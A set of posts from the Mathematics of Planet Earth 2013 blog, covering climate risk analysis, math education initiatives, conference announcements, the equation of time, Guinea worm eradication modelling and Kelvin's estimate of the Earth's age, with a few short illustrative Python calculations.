    The cigarette risk analysis is not a perfect analogue to the climate change risk analysis problem: once you remove cigarettes, you remove the problem of cigarettes and cancer. On the other hand, climate will and does change, whether it is due to human activities or not. Climate change can have a huge impact on some or many of us. Natural or man-made, some of the people who stand to lose a lot from the change are the very people who rely extraordinarily on cheap energy to make it through a change that can have monumental effects on society and the economy.

    To characterize this problem as non-existent is stupid. But to think that it is just a bit more complicated than what we need to do to keep the Mississippi River always flowing in the same place is, at best, irresponsible. Aside from this being one of the most complex risk analysis problems ever, it is not clear what should or could be done to reduce the impact of climate change. It is perfectly valid to ask, as some climate change debaters do, whether the (presumed) huge resources required to tackle climate change right now would be better spent on wiping out hunger or ravaging diseases, for example.

    No one really knows what could be done about weather or climate change. Some scenarios include climate engineering. Climate engineering gives some people the shivers, since it requires us to know a lot about climate (I think far more than we know at present), but research in it should be pursued. Virtually every risk analysis scenario involves two aspects of human activity: energy use and population growth. Both issues are correlated with warming and go beyond climate change. Did I also mention that some of it is unpalatable, if you are the country that uses about one quarter of all energy worldwide, or if you are a developing nation, or if you are neither but your country is slowly disappearing under the waves and you have zero influence on the rest of humanity?

    The risk analysis folks don’t even have a good managed-risk plan at present. What are the key challenges in climate dynamics that need to be handled in order to produce serious climate-change risk analysis strategies? You can mention obvious things. More data, although for a problem with at least $10^7$ degrees of freedom there is no expectation that we can avoid a Bayesian approach that combines models and data in some way. Significantly improved bounds on uncertainties, and better means of obtaining them. In models, they need significantly more reliable ways to capture how local effects affect global ones and vice versa. They need faster ways of producing different climate scenarios. They need better and more complete notions of sensitivity analysis. But frankly, the most important thing is a better understanding of the physics of climate: a global climate model is nothing more than a compendium of dynamics that agree with our expectations of outcomes; there are no theorems in this business. This is how most science outside of mathematics is done: via compelling evidence, not necessarily evidence beyond a shadow of doubt. Insight into climate is the key to understanding how to parameterize microscales, challenge the curse of dimensionality of the system, produce better data assimilation strategies, and create better sensitivity tools.

    The writer is Professor in the Mathematics Department at The University of Arizona. He has been doing research in climate dynamics, ocean dynamics, sensitivity analysis, and data assimilation for about 20 years. He is also Professor of Physics and of Atmospheric Sciences at Arizona.


    Prof. Juan M. Restrepo
    Group Leader, Uncertainty Quantification Group

    Department of Mathematics
    Physics Department
    Atmospheric Sciences
    University of Arizona
    Tucson AZ 85721, U.S.A.

    Juan Restrepo

    Posted in Climate Change, Risk Analysis | Leave a comment

    Ecosystem Dynamics and Management

    A changing world raises great challenges since we need to take steps that either reduce the rate of global change or that manage resources in the face of global change. Both steps require making predictions, which requires theory. But the systems involved are truly complex, so the theory must use mathematics. Mathematics applied to ecology and other environmental sciences has a long history of successes, but understanding the resilience of environmental systems in the face of global change presents substantial mathematical challenges that require novel approaches.

    In concert with the MPE 2013 initiative, the NSF’s Mathematical Biosciences Institute (MBI) at Ohio State will host three workshops in the fall of 2013 under the theme of Ecosystem Dynamics and Management.  These workshops will bring together experts from many disciplines to address these challenges.

    Tony Nance
    Mathematical Biosciences Institute
    tony@mbi.osu.edu

    Posted in Ecology, Resource Management, Workshop Announcement | Leave a comment

    MPE in the Classroom

    Upon encountering a mathematics topic such as logarithms, students in typical introductory mathematics classes often ask “When will I ever use this math?”  Without seeing relevant applications, students lose motivation and without motivation, they struggle to learn the concepts.  In contrast, when students are first presented with authentic, important, “Big Questions” concerning valuable real world topics, they often learn the math just in time to address the topics and as a result they cannot help but be more motivated and engaged.  Our interactions with each other and our planet generate these “Big Questions,” addressing issues such as energy, water, food, air quality, health, quality of life, and climate change. One of the goals of MPE2013 is to collect, develop, and disseminate educational materials that highlight the role mathematics plays in helping us understand our planet and ourselves.

    As part of the United States launch of MPE2013, pedagogical talks on Integrating the Mathematics of Planet Earth 2013 in the College Mathematics Curriculum will be presented next week during the Joint Mathematics Meetings in San Diego, California, the world’s largest annual mathematics conference. The talks will address how to incorporate a wide variety of key issues related to planet Earth in mathematics classes at various curricular levels.

    Planet Earth inspired presentation topics include:
    •    Nonrenewable energy sources; a study of how long they will last and exploration of optimization methods for managing a dwindling supply.
    •    Water resources; ways to use real data to develop sustainable usage strategies.
    •    Arctic sea ice; a project that examines how data can be used to tell us about the past and the future.
    •    Global air temperature change; an investigation of its impact on the frequency of extreme weather events.
    •    Ozone depletion; accessible data analysis techniques allow for student self-discovery of possible future problems.

    A full list of speakers and abstracts can be found here.

    Development of new teaching materials is a highlighted activity within the MPE2013 educational program. For example, the Center for Discrete Mathematics and Theoretical Computer Science (DIMACS) will be releasing a set of sustainability-focused modules during JMM, and the workshop Educating with Math for a Sustainable Future, sponsored by the Mathematical Association of America Professional Enhancement Program (MAA PREP), will similarly release a set of materials for classroom use later this year. Planning is underway for future MPE curriculum development workshops, including the MAA PREP-funded Undergraduate Sustainability Experiences in Mathematics (USE Math) on Your Campus and the NSF-funded MPE 2013+ Workshop on Education for the Planet Earth of Tomorrow.

    To encourage easy access to these and other K-16 focused, MPE-related resources, MPE2013 has created a dedicated MPE2013 Curriculum Materials webpage. This site includes a link to an open submission form that allows anyone to submit a brief description and link to materials that they would like to share on the MPE site.

    This is just an introduction to the MPE-themed educational activity planned for this year and beyond, but it exemplifies the educational goal of MPE2013: to encourage the development of a mathematically literate generation that is aware of the challenges we face and is motivated to solve them.

    Ben Galluzzo
    Shippensburg University

    Posted in Education | Leave a comment

    A Word from the President of SIAM

    As we enter the new year, SIAM, along with more than one hundred universities, research institutes, and other scientific organizations, is thrilled to be a part of Mathematics of Planet Earth 2013. It is an exciting year-long program dedicated to examining just what mathematics can teach us about the world’s most pressing challenges, whether it’s creating stronger and lighter materials, modeling epidemics, or better understanding extreme climate change. And the kickoff is just around the corner, at the Joint Math Meetings in San Diego later this month. This MPE13 blog will feature many researchers interacting and engaging with the public and the scientific community as MPE13 explores the world around us. So be sure to visit the blog all year, and contribute to it, for your up-to-the-minute dose of exciting world-changing mathematics.

    Irene Fonseca, President
    Society for Industrial and Applied Mathematics (SIAM)

    Mellon College of Science Professor of Mathematics
    Carnegie Mellon University

     

    Posted in General | Leave a comment

    New Professional Master’s Programs Emerge in the Mathematical Sciences

    Unprecedented in its all-encompassing scope and geographic reach, the MPE2013 year brings the universality of mathematics to the forefront, with the hope of making the general public aware of the insights it provides into many human endeavors, of its capability to predict natural phenomena and processes, and of its power to create and shape new discoveries.

    This also brings the need not only to inspire the new generation, but also to develop new educational programs for them: programs that cultivate vital quantitative skills and sow the seeds of the mathematical insight needed in an increasingly multidisciplinary and interconnected world.

    The Professional Science Master’s Programs (PSM), a new breed of graduate programs, have emerged in the last decade and a half as a response to the workforce need for STEM professionals with strong scientific and professional skills. Developed in consultation with business leaders, these programs provide depth in a discipline and breadth in adjacent fields, industrial projects and internships that stimulate creativity and innovation in emerging, predominantly multidisciplinary, areas. Currently almost 300 PSM programs in over 125 universities train students in different scientific areas.

    Several PSM programs in financial mathematics, industrial mathematics, and data analytics have been developed in recent years, as well as PSM programs with a significant mathematics and statistics component, such as the bioinformatics PSMs. The NSF-funded workshop Creating Tomorrow’s Mathematics Professionals (npsma.org/past-workshops), held a year ago, focused on PSMs in the mathematical sciences. Representatives from industry, Lilian Wu (IBM), Teresa Eller and Matt Nagowski (M&T Bank), and Birgit Schoeberl (Merrimack Pharmaceuticals), addressed the need for mathematicians trained to mine large quantities of data and to use and develop models for financial instruments, for consumer risk, and for network biology. Faculty representatives of PSM programs, Lorena Mathien and Joaquin Carbonara (Buffalo State), Paul Eloe (University of Dayton), Peiru Wu (Michigan State), Aric LaBarr (NC State), Sangya S. Varma, Deborah Silver, and David L. Finegold (Rutgers), Syed Kirmany (University of Northern Iowa), and Marcel Blais (WPI), presented their PSM programs, discussed the mathematics curriculum and the other science, engineering, business, and professional-skills courses, and presented alumni profiles. For 2013, the National Professional Science Master’s Association (NPSMA) is planning similar workshops on data analytics and cyber security.

    The 2012 SIAM Report on Mathematics in Industry presents 18 case studies of business applications of mathematics in the areas of business analytics, mathematical finance, systems biology, oil discovery and extraction, manufacturing, communications and transportation, modeling of complex systems, computer systems, and IT. These suggest that over the next decade the employment of mathematically trained professionals will be concentrated in the finance and insurance industry, the life sciences and pharmaceutical industry, and information technology. These sectors will need a workforce well trained in mathematical finance, risk analysis, computational modeling, data analytics, machine learning, optimization, and statistics, who also have a good understanding of finance, business, biology, chemistry, computer science, and related fields. Existing and new PSM programs will need to respond to this need.

    MPE2013 aims to bring the mathematics community together to work on the challenges facing the planet, at a time when all human activities have global significance and impact. At the same time, we need to think about educating the young generation to understand and solve the challenging problems of planet Earth.

    Bogdan Vernescu, President
    National Professional Science Master’s Association

    Posted in Education | Leave a comment

    MPE2013, Antarctica, and the Porter Lecture

    Welcome to the MPE2013 Blog! During the coming year we intend to bring you information about the themes of MPE2013: mathematics (including statistics), climate, sustainability and the state of the planet. Some posts will report news items of general interest, or draw attention to special events taking place in the framework of MPE2013. Other posts will address relevant educational issues, or present personal thoughts about mathematics and our understanding of the environment. And, yes, we hope that there will be some provocative posts that will promote discussion and generate new ideas.

    Let me move on to the second item in the title of this blog. On Christmas Eve, The New York Times featured an article on Antarctica that caught my attention, “Antarctic Warming is Speeding Up, Study Finds.” The article was based on a paper released the previous day in the journal Nature Geoscience claiming that West Antarctica has warmed by 4.4 degrees Fahrenheit since 1958. If confirmed, this is shocking news. The Antarctic ice sheet is one of the best indicators of changes in the global climate system. It is already under attack at the edges by warmer ocean water, and a potential collapse of the ice sheet is one of the long-term hazards of global warming. We know relatively little about the Antarctic ice sheet. The place is not very friendly to visitors, and scientific observations are few and far between. But mathematicians have been and continue to be involved in efforts to get a better understanding of the Antarctic ice sheet and surrounding sea ice. This brings me to the third term in the title of this blog.

    On Saturday, January 12, Professor Ken Golden of the Department of Mathematics at the University of Utah will give the Porter Lecture at the Joint Mathematics Meetings in San Diego, California. Ken is an expert on the mathematical modeling of composite materials and has been working on ice sheets, sea ice, and melt ponds for several years. Not just from behind his desk, but out in the cold, both in the Arctic and in Antarctica. Several of his graduate and undergraduate students have had the good fortune to join Ken on these expeditions. What better role model for aspiring mathematicians! Ken is an enthusiastic speaker, and I am looking forward to his lecture about “The Melting of Polar Ice Caps.” The lecture will be videotaped and made available for later use.

    Hans G. Kaper
    Co-director, Mathematics and Climate Research Network
    kaper@mathclimate.org

    Posted in Conference Announcement, Cryosphere, Public Event | Leave a comment

    A new year is starting today!

    A new year is starting today. What will happen during this year? Will it again be warmer than normal, as the last 12 years have been? Will extreme meteorological events threaten our crops? Can we expect dramatic hurricanes next fall? When and where will the next strong earthquake happen? Will the world economy continue its recovery from the last economic crisis? Will new invasive species destabilize or destroy our ecosystems? When and where will the next pandemic occur?

    We are all curious to know our planet better and to understand its future. Part of what we cannot see with our eyes, we can discover with our mathematical glasses. Many of us mathematicians had not previously brought together our natural curiosity about our planet and our professional activities in research and teaching. Mathematics of Planet Earth is a fantastic opportunity to learn about the role of mathematics in understanding and solving planetary problems.

    During the whole year, in parallel with the scientific activities for specialists, MPE activities will occur on a regular basis around the world: colloquium talks, public lectures, activities for the schools. Hence, this provides an excellent opportunity to learn about MPE topics and the mathematical questions and developments behind these topics.

    The success of MPE2013 comes from the fact that it is so timely. The scientific community, including the mathematical community, is aware of the need for new scientific developments to understand planetary problems. In the schools, it is more important than ever to explain why mathematics matters: linking mathematics to societal problems is an excellent way to do so.

    There are no latecomers with MPE2013. The planetary problems will, unfortunately, not be solved by the end of 2013. The curriculum material developed for 2013, highlighting applications of mathematics to planet Earth problems, will start a new trend in education: more universities may decide to start programs in mathematics of the environment. Books may be produced in the long term. More enrichment material for the schools will appear in the coming years. And the community will have come to appreciate the benefits of international collaboration.

    New partners continue to join, and new activities continue to be planned. India is organizing a large MPE competition in the schools of the country, with a deadline in mid-June 2013. The University of Education in Vietnam is organizing an MPE math camp for students next summer. Malaysia organized a national launch on December 15. Two days of MPE activities are now planned in Mali, targeting all school levels starting from kindergarten. In Canada, the Pacific Institute for the Mathematical Sciences is working on mathematics education for aboriginal communities. There is a lot of enthusiasm in these communities for MPE2013: linking nature to the teaching of mathematics is very close to the values of aboriginal communities, and likely to interest students and to encourage dropouts to continue their studies.

    Christiane Rousseau

    Posted in General | Leave a comment

    The Mathematics of Extreme Climatic Events

    The UK’s launch event at the Isaac Newton Institute was a fantastic success, and the videos, including the guest speakers’ talks, are now online.

    Posted in Conference Announcement, Conference Report | Tagged | 2 Comments

    CIM International Conferences and Advanced Schools Planet Earth, Portugal 2013

    The International Center of Mathematics (CIM) is a partner institution of the international program Mathematics of Planet Earth 2013 (MPE 2013) and plans to organize and support several activities within its scope.

    http://sqig.math.ist.utl.pt/cim/mpe2013/

    To this end, CIM is organizing the following CIM International Conferences and CIM Advanced Schools Planet Earth:

    MECC 2013 – International Conference and Advanced School Planet Earth, Mathematics of Energy and Climate Change, 18-28 March 2013.
    Keynote speakers and school lecturers: Inês Azevedo, Carnegie Mellon University, USA; Richard James, University of Minnesota, USA; Christopher K. R. T. Jones, University of North Carolina, USA; Pedro Miranda, Universidade de Lisboa, Portugal; Keith Promislow, Michigan State University, USA; Richard L. Smith, University of North Carolina, USA; José Xavier, Universidade de Coimbra, Portugal; David Zilberman, University of California, Berkeley, USA.

    DGS 2013 – International Conference and Advanced School Planet Earth, Dynamics, Games and Science, 26 August to 7 September 2013.
    Keynote speakers and school lecturers: Michel Benaim, Université de Neuchâtel, Switzerland; Jim Cushing, University of Arizona, USA; João Lopes Dias, Universidade Técnica de Lisboa, Portugal; Pedro Duarte, Universidade de Lisboa, Portugal; Diogo Gomes, Universidade Técnica de Lisboa, Portugal; Yunping Jiang, City University of New York, USA; Eric Maskin, Institute for Advanced Studies, USA (schedule permitting); Jorge Pacheco, Universidade do Minho, Portugal; David Rand, University of Warwick, UK; Martin Shubik, Yale University, USA (video lecture); Satoru Takahashi, Princeton University, USA; Marcelo Viana, Instituto de Matemática Pura e Aplicada IMPA, Brazil.

    The first two volumes of the CIM Series in Mathematical Sciences published by Springer-Verlag will consist of selected works presented in the conferences Mathematics of Planet Earth (CIM-MPE). The editors of these first two volumes are Jean Pierre Bourguignon, Rolf Jeltsch, Alberto Pinto and Marcelo Viana.

    Posted in Conference Announcement | Tagged | Leave a comment

    MPE2013 Has Been Launched!

    MPE2013 is being launched today! The international launch takes place at the winter meeting of the Canadian Mathematical Society in Montreal and coincides with the Canadian launch.

    It is already three years since I had the idea of MPE2013. During this time I had email exchanges with more than 100 partners, I was involved in several committees, and I made friends around the world. In the first year it was necessary to be pro-active in order to attract new partners. Also, it took time to get people at the school level interested. The enthusiasm for MPE2013 continued to grow. Now MPE2013 spreads by itself, and new partners join regularly. More countries and regions decide to organize activities for the schools. For instance, in France, the Ministry of Education decided that MPE would be the theme of the 2013 week of mathematics. The Math Awareness Month in the United States will deal with Sustainability. And I just learned that India is organizing a large MPE competition in the schools of the country, with a deadline in mid-June 2013.

    Because the international launch of MPE2013 takes place at the winter meeting of the Canadian Mathematical Society in Montreal, several public activities will take place in French. The launch starts with a panel discussion (in French) chaired by the science journalist Pierre Chastenay: “What can mathematics do for the planet?” Ivar Ekeland (UBC and Paris-Dauphine), a great popularizer of mathematics will be one of the panelists.

    Ivar Ekeland will also deliver an MPE public lecture, “Une longue histoire: la planète Terre et les mathématiques”. I had fascinating discussions with him, where he explained some of the main challenges of the economy of sustainability: you invest now for benefits to be felt in 50 to 100 years. How do you calculate the interest rates? The second MPE public lecture, “The complex challenge of sustainability,” will be given by Doyne Farmer (Oxford). In his abstract he states: “Sustainability forces us to think clearly about our vision of the future, putting philosophy into direct contact with science.” I had met Doyne at a workshop on “Mathematical Challenges in Sustainability” at DIMACS in November, 2010, and was impressed by his global vision of the planetary problems. It is a challenge for us mathematicians to make sure that we address the real problems, which may require finding new tools and not just applications for the tools that we already have.
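
    Ekeland’s question about interest rates is easy to illustrate numerically: the present value of a benefit realized 50 or 100 years from now is extremely sensitive to the discount rate chosen. The small calculation below is purely illustrative; the amounts and rates are made up, not taken from Ekeland’s lecture.

        # Present value of a benefit B received t years from now, under continuous
        # discounting at rate r: PV = B * exp(-r * t).  Illustrative numbers only.
        import math

        benefit = 1_000_000.0   # hypothetical future benefit, arbitrary units
        for t in (50, 100):
            for r in (0.01, 0.03, 0.05):
                pv = benefit * math.exp(-r * t)
                print(f"t = {t:3d} years, r = {r:.0%}: present value = {pv:12,.0f}")

    A benefit a century away is worth roughly a third of its face value at a 1% rate, but less than 1% of it at a 5% rate, which is why the choice of discount rate dominates the economics of sustainability.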

    The meeting will start with a lecture by Graciela Chichilnisky, a mathematician and economist from Columbia University. Graciela Chichilnisky is scientifically very involved in all questions of sustainability. She introduced the concept of basic needs, adopted by 153 nations at the UN Earth Summit in Rio de Janeiro in 1992. She is also the author of the carbon market of the UN Kyoto Protocol, which became international law in 2005. And she was a U.S. Lead Author of the Intergovernmental Panel on Climate Change, which received the 2007 Nobel Peace Prize. If you read her book Saving Kyoto, you will learn that she attends these international conferences on climate change, working to influence the final agreements signed by the participants. Graciela Chichilnisky is a model of a scientist who combines high-level science with a commitment to saving the planet. She has certainly been an inspiration for me during these last years of working on MPE2013.

    The meeting comprises two other plenary lectures related to MPE. Catherine Sulem (Toronto) will speak on the fascinating subject of large ocean waves such as tsunamis. The speed of propagation of such waves depends on the depth of the ocean and also on the bottom topography. Their impact further depends on the shape of the coastline.
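
    For long waves such as tsunamis, the textbook shallow-water approximation gives a propagation speed of roughly the square root of g times the depth. The sketch below is that standard estimate with illustrative depths; it is not a summary of Sulem’s lecture.

        # Shallow-water estimate of tsunami propagation speed: c = sqrt(g * h).
        # Depth values are illustrative.
        import math

        g = 9.81  # gravitational acceleration, m/s^2
        for depth_m in (4000, 1000, 50):
            c = math.sqrt(g * depth_m)          # speed in m/s
            print(f"depth {depth_m:5d} m: c = {c:6.1f} m/s = {c * 3.6:7.1f} km/h")

    Over the deep ocean a tsunami travels at jet-airliner speeds; it slows dramatically, and steepens, as it reaches shallow coastal water.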

    Among the four themes of MPE2013, we find a planet supporting life and a planet organized by civilizations. The lecture of Martin Nowak (Harvard) will make the link between these two themes by presenting the role of cooperation in the evolution and in the survival of intelligent life on Earth.

    MPE2013 is so successful not only because it is timely, but also because many mathematicians have worked very hard to make it a success. MPE2013 could not have reached this breadth without the immense role played by the American Institute of Mathematics (AIM) and its Director, Brian Conrey. Today I thank all the others collectively, but I will certainly introduce them to you individually in future blog posts.

    Christiane Rousseau

    Posted in General | Leave a comment

    Mathematics of Planet Earth Beyond 2013 (MPE 2013+)

    Mathematicians Tackle Challenges to the Planet with Support from the National Science Foundation

    The U.S. National Science Foundation (NSF) has provided a grant of $467,549 to support the extension of the Mathematics of Planet Earth (MPE2013) program into the future.

    With the human population recently having surpassed 7 billion, protecting the earth and its resources is a shared challenge facing all of humanity. People need food, housing, clean water, and energy; yet the earth’s systems and dynamics are unpredictable, and its resources are limited. We need to understand the impact of our actions on the environment, how to adapt those actions to lessen our impact, how to predict and respond to catastrophic events, and how to plan for changes to come. The most pressing problems are inherently multidisciplinary, and the mathematical sciences have an important role to play. A large community of mathematical scientists has stepped forward to embrace this role through participation in the Mathematics of Planet Earth (MPE2013) project.

    MPE was launched by a group of mathematical sciences research institutes to promote awareness of the ways in which the mathematical sciences are used in modeling the earth and its systems—both natural and man-made. MPE aims to increase the contributions of the mathematical sciences community to protecting our planet by: strengthening connections with other disciplines; involving a broader community of mathematical scientists in related applications; and educating students and the general population about the relevance of the mathematical sciences. MPE’s mission is to increase engagement of mathematical scientists—researchers, teachers, and students—in issues affecting the earth and its future.

    MPE was conceived as a year-long project slated to begin in January 2013, involving mainly North American institutions. It has since evolved to become a truly worldwide initiative and now includes partners from all continents and endorsement by the International Mathematical Union, International Council of Applied and Industrial Mathematics, International Commission of Mathematical Instruction, and UNESCO, among others. As MPE has gained members, it has become clear that there is momentum to propel it beyond 2013. The problems facing our planet will persist, and this proposed project will involve mathematical scientists in laying the groundwork for a long-term effort to surmount them. The extended effort is called MPE2013+.

    The NSF support will allow us to sustain MPE activities beyond 2013 by:

    • conducting five research workshops that will each define a set of future research challenges;
    • establishing a Research and Education Forum (REF) associated with each workshop that will involve follow-up smaller group meetings to flesh out the challenges, identify potential follow-up activities, and begin collaborations;
    • holding an education workshop that helps to identify how to integrate themes identified in the research workshops into undergraduate and graduate curricula;
    • finding ways to involve the next generation of mathematical scientists in the effort, with special emphasis on involving under-represented minorities in the MPE workforce of the future, especially through a “pre-workshop” directed at preparing graduate students, postdocs, and others for involvement in the research workshops;
    • disseminating information about the mathematics of planet earth by creating a website and other publicity materials for the project.

    Research workshops will reflect some of the major themes of MPE: Management of Natural Resources, Sustainable Human Environments, Natural Disasters, Data-aware Energy Use, and Global Change.

    MPE2013+ will be managed by the Center for Discrete Mathematics and Theoretical Computer Science (DIMACS). DIMACS, based at Rutgers University, was founded as a prestigious NSF “science and technology center” and has 13 partner organizations and some 360 affiliated scientists. MPE2013+ is part of the DIMACS Sustainability Initiative (http://dimacs.rutgers.edu/SustainabilityInitiative/), which includes educational programs, workshop programs, research efforts, and international outreach. MPE2013+ is under the leadership of Dr. Fred Roberts of Rutgers University, a Professor of Mathematics and Emeritus Director of DIMACS.

    Organizing Committee for MPE2013+:

    • Brian Conrey, Executive Director of the American Institute of Mathematics (AIM)
      conrey@aimath.org

    • Margaret Cozzens, Center for Discrete Mathematics and Theoretical Computer Science (DIMACS)
      midge6930@comcast.net

    • David Ellwood, Research Director, Clay Mathematical Institute
      ellwood@math.harvard.edu

    • Mary Lou Zeeman, R. Wells Johnson Professor of Mathematics at Bowdoin College
      mlzeeman@bowdoin.edu

    • Fred Roberts, Professor of Mathematics at Rutgers University and Emeritus Director of DIMACS
      froberts@dimacs.rutgers.edu
    Posted in General | 2 Comments

    The Equation of Time

    The solar noon is defined as the time of the highest position of the Sun in the sky and occurs when the Sun crosses the meridian at a given position. The length of the solar day is the time between two consecutive solar noons.

    The mean length of the day, namely 24 hours, is a little more than the period of rotation of the Earth around its axis, since the Earth makes 366 rotations around its axis during a year of 365 days. If the axis of the Earth were vertical and the orbit of the Earth around the Sun circular, the mean length of the day would correspond to the time between two consecutive solar noons and therefore to the length of the solar day. For the Greenwich meridian, the official noon is defined as the solar noon at the spring equinox, and then for the other days of the year by applying a period of 24 hours.

    The solar noon oscillates during the year; it coincides with the official noon only on four days during the year. The equation of time is the difference between the solar time and the official time (mean solar time).

    The fact that the equation of time shows oscillations with a total swing of approximately 30 minutes is explained by two phenomena. The first is the obliquity (tilt) of the Earth’s axis: if the orbit of the Earth around the Sun were circular, the official noon would coincide with the solar noon at the equinoxes and at the solstices; it would fall after the solar noon in fall and spring, and before the solar noon in summer and winter. The second ingredient is the eccentricity of the Earth’s orbit around the Sun: when the Earth is closer to the Sun (during the winter of the Northern Hemisphere), it has a higher angular velocity around the Sun, which yields longer solar days.
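
    A commonly used empirical approximation of the equation of time, in minutes, is EoT(N) ≈ 9.87 sin(2B) − 7.53 cos(B) − 1.5 sin(B), with B = 2π(N − 81)/364, where N is the day of the year. This formula is one of several in the literature and is only accurate to a minute or two, but it reproduces the swing described above; the sketch below evaluates it on a few dates.

        # Empirical approximation of the equation of time (minutes).
        # Accurate to roughly one or two minutes; good enough to show the annual swing.
        import math

        def equation_of_time_minutes(day_of_year: int) -> float:
            b = 2.0 * math.pi * (day_of_year - 81) / 364.0
            return 9.87 * math.sin(2 * b) - 7.53 * math.cos(b) - 1.5 * math.sin(b)

        for n in (46, 105, 200, 306):  # mid-February, mid-April, mid-July, early November
            print(f"day {n:3d}: solar noon differs from mean noon by "
                  f"{equation_of_time_minutes(n):+6.1f} min")

    The output shows the two extremes, roughly minus 14 minutes in mid-February and plus 16 minutes in early November.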

    Posted in Celestial Mechanics | Leave a comment

    Using Mathematical Modeling to Eradicate Diseases

    Guinea Worm Disease is a parasitic disease, spread via drinking water, that has been with us since antiquity. (It is mentioned in the Bible, and Egyptian mummies suffered from it.) Essentially, the parasite attaches itself to a water flea, you drink the flea, and your stomach acid dissolves the flea leaving the parasite free to invade your body. Because of gravity, it usually makes its way to the foot, where it lives for an entire year.

    After a year, your foot is burning and itching, so you put it in water. And if your village only has one source of water, then that source often ends up being the drinking water. At this point, the fully grown worm bursts out of your foot, spraying forth 100,000 parasites and hence restarting the process.

    Unfortunately, there is no drug to treat Guinea Worm Disease, and there is no vaccine either. Miraculously, however, Guinea Worm Disease is about to be eradicated, making it the first parasitic disease to be eradicated and the first to be eradicated without biomedical interventions. This is largely thanks to the efforts of former President Jimmy Carter. So how can one eradicate a disease without a drug, vaccine or immunity?

    Using a mathematical model, we can quantify the major factors that we can control: education (reducing the parasite birth rate $\gamma$), filtration (reducing the transmission rate $\beta$) and chlorination (increasing the parasite death rate $\mu_V$). The basic reproductive ratio $R_0$ represents the mean number of individuals infected by each infected individual. Eradication becomes possible once the interventions bring $R_0$ below the threshold value $R_0 = 1$.

    [Figure: the level surface $R_0(\gamma,\beta,\mu_V)=1$ for Guinea Worm Disease]

    The figure represents the level surface $R_0(\gamma,\beta,\mu_V)=1$. If you are above the surface, then $R_0$ is greater than 1 and the disease will persist. If you are below the surface, then $R_0$ is less than 1 and the disease will be eradicated.

    Increasing the parasite death rate involves moving along the $\mu_V$ axis to the rear left. But the level surface is very shallow, so you need to move a long way to the back corner to get under the surface. Reducing transmissibility involves moving down the $\beta$-axis. But this is on a log scale, so that takes much longer than it first appears. However, see how steep the surface is for small $\gamma$? This makes it very easy to move under it by a small change in $\gamma$. This suggests that eradication should occur if we stick to one strategy: reducing the parasite birth rate.
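
    The post does not give the explicit formula for $R_0$, so the sketch below uses a hypothetical form $R_0 = \gamma\beta/\mu_V$ purely to illustrate how one checks whether a chosen combination of interventions crosses the eradication threshold; the parameter values are made up.

        # Illustrative threshold check for disease eradication.
        # The functional form R0 = gamma * beta / mu_v is a hypothetical stand-in,
        # NOT the actual Guinea worm model discussed in this post.

        def r0(gamma: float, beta: float, mu_v: float) -> float:
            return gamma * beta / mu_v

        def eradicated(gamma: float, beta: float, mu_v: float) -> bool:
            return r0(gamma, beta, mu_v) < 1.0

        # Baseline (made-up numbers) vs. an education campaign that lowers gamma.
        baseline = dict(gamma=5.0, beta=0.8, mu_v=2.0)
        with_education = dict(gamma=0.4, beta=0.8, mu_v=2.0)

        for label, p in (("baseline", baseline), ("with education", with_education)):
            print(f"{label:15s}: R0 = {r0(**p):.2f}, eradicated: {eradicated(**p)}")

    The point of the surface in the figure is exactly this kind of comparison: near the steep part of the surface, a modest reduction in $\gamma$ is enough to drop $R_0$ below 1.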

    Encouraging people not to put their infected limbs in the drinking water means that, each time, a worm does not burst into the water and 100,000 parasites are not released. What this means is that, in the final push to eradication, we should concentrate our efforts on reaching remote communities and informing them about the specifics of Guinea Worm Disease and its transmission cycle. Of course, a combination of all three factors will help. But it is education that holds the key to removing this ancient scourge, and it points the way forward to controlling or eradicating other diseases without waiting for someone to develop a vaccine. If we can harness the power of education, we can change the world.

    Robert Smith?, Ottawa

    Posted in Disease Modeling, Epidemiology, Public Health | Leave a comment

    Call for MPE Bloggers

    The MPE2013 Working Group for Public Awareness and Social Media is in the process of organizing a community of MPE2013 Bloggers. We invite you to join in this public conversation about the mathematical sciences and their relevance to studies of Planet Earth. Everyone is welcome, whether you are an old hand at blogging or a newcomer to social media.

    We encourage personal commentary on any topic associated with MPE2013. A contribution can be a report on a meeting, a pointer to important research results, a website recommendation, a short essay on a key issue, a book review, a news item, or any other material that might be of interest to a broad audience. A contribution can be as short as a couple of paragraphs and may include a photo or illustration or even an audio or video clip. We recommend no more than about 1,000 words of text. Here is a link to a helpful web site, http://www.maa.org/pubs/FOCUSfeb-mar12_blogroll.html, in case you are wondering how to get started.

    We anticipate a daily blog during the entire year 2013. You may choose your date(s) and topic(s) to blog about your favorite event(s). We understand that last-minute changes are part of the action. To register, send a message to blog@mpe2013.org, with an indication of preferred dates and topics.

    Posted in General | Comments Off on Call for MPE Bloggers

    How Old Is the Earth?

    The first serious attempts to compute the age of the Earth were made by Lord Kelvin in the 1860s. Kelvin used Fourier’s law of heat conduction, with the temperature gradient measured empirically, and some very strong simplifying hypotheses: there are no internal sources of heat, and the planet is rigid and homogeneous. He gave an interval of 24 to 400 million years. It is now known that the age of the Earth is 4.5 billion years. Already in Kelvin’s time, his estimate contradicted the observations of geologists and was incompatible with Darwin’s new theory of evolution, which required a much older planet.
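
    A back-of-the-envelope version of Kelvin’s argument uses the cooling half-space solution of the heat equation: the surface temperature gradient decays as $T_0/\sqrt{\pi\kappa t}$, so a measured gradient $G$ yields an age $t \approx T_0^2/(\pi\kappa G^2)$. The numerical values in the sketch below are illustrative choices, not Kelvin’s own figures, but they land in the same range.

        # Kelvin-style age estimate from the cooling half-space solution of the
        # heat equation: surface gradient G = T0 / sqrt(pi * kappa * t),
        # hence t = T0**2 / (pi * kappa * G**2).  Illustrative values only.
        import math

        T0 = 2000.0        # assumed initial temperature of the Earth, in kelvin
        kappa = 1.0e-6     # thermal diffusivity of rock, m^2/s
        G = 0.03           # assumed near-surface temperature gradient, K/m

        t_seconds = T0**2 / (math.pi * kappa * G**2)
        t_years = t_seconds / (3600 * 24 * 365.25)
        print(f"estimated age: {t_years / 1e6:.0f} million years")

    With these inputs the estimate comes out at a few tens of millions of years, which shows how the homogeneous-conduction assumption, rather than the measurements, drives the answer.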

    It was Kelvin’s assistant, John Perry, who pointed out that the temperature gradient was too large for Kelvin’s hypothesis of homogeneity, and that the gradient could be explained by convective motion in a fluid interior beneath a thin solid outer shell; this convection would considerably slow down the cooling and allow the age of the Earth to exceed 2 billion years. Radioactivity, an internal source of heat, was discovered soon after, showing that the Earth’s heat content could not be assumed constant. John Perry was ahead of his time; he argued that the Earth’s mantle behaves as a solid on short time scales and as a fluid on longer time scales. But the idea of continental drift met strong skepticism in the scientific community, including among geologists, and it was only in the 1960s that it finally prevailed.

    Reference:
